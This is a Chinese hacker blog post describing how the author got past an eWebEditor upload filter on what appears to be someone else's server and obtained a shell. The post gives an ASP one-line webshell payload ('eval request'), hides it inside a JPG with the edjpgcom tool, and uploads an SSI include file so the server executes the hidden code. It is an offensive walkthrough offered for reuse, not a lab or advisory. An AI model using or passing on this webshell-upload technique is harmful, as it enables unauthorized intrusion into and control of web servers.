|
Author:瘋吇ぺx
From: http://www.bhst.org/
Blog: http://hi.baidu.com/hacker_fengzi
转载请保留此段文字
其实也算不上什么突破,只是在上传的过程中添加了一个新的元素,使得这个上传看起来还是比较有点新意。
今天ECHO发过来一个ewebeditor说是传上去之后访问一片空白什么都没有,没有任何的提示,马并没有成功执行。抱着怀疑的态度自己又传上去一个小马,结果返回如图1.
查看源代码也是空空的。这是什么原因?很明显我们的马确实传上去了,也排除了被杀的可能,也没什么禁止执行脚本的字样。于是又把一句话保存成jpg传上去还是一样。如图2.
再随便传个脚本文件成功返回内容。如图3.
看来是跟脚本里的代码有关。估计是服务器方面装什么东东,又或者是ewebeditor在上传的时候调用了自身携带的脚本过滤文件DeCode.asp。其中有部分代码如下:
- function eWebEditor_DecodeFilter(html, filter){
- switch(filter.toUpperCase()){
- case "SCRIPT": // 去除所有客户端脚本javascipt,vbscript,jscript,js,vbs,event,...
- html = eWebEditor_execRE("</?script[^>]*>", "", html);
- html = eWebEditor_execRE("(javascript|jscript|vbscript|vbs):", "$1:", html);
- html = eWebEditor_execRE("on(mouse|exit|error|click|key)", "<I>on$1</I>", html);
- html = eWebEditor_execRE("&#", "<I>&#</I>", html);
- break;
复制代码
我们可以看到其中只是去除上面的脚本和几个响应事件,如果是这样的话应当也不会影响到我们的一句话啊“<%eval request(chr(35))%>”。那估计就是服务器方面的问题了。可是现在只要是一句话就传不上去,无论怎加密变形就是无济于事。如果在图片里加上一句话呢?郁闷的事情又来了,还是和以前一样。看来是没戏了,和同事扯了会蛋突然想到一个小东东“edjpgcom”
相信大家都知道了吧!去网上找了一个图片使用“edjpgcom”在里边加入一句话,如图4.
这个小东东的好处就是在图片里加入代码或文字不会影响图片的运行效果,而且用普通的以文本方式打开也看到不加入的代码或文字。这样我们就成功绕过了那个鬼东西的检测,成功上传之后访问成功,如图5.
现在我们来验证一下我们的一句话是否还保存在图片中,(查看内容和添加内容是一样的)于是下载回来直接把图片拖到“edjpgcom”中看到我们的一句话还在。这样就好办了,最后我们再上传一个包含调用文件,内容为
“<!--#include file = "2009125234235622.jpg"-->”之后成功上传,如图6
用一句话连接,如图7
最后成功得到shell。于是马上去看看以前上传的脚本和图片发现确实传上去了,但都是一片空白。不管怎么样最后还是成功得到了shell,其实本文没什么意思含量,只是一些比较老的东西了,但我想说的是往往一些很不起眼的东西组合起来会有很大的力量。
|
推荐
评论(0条)
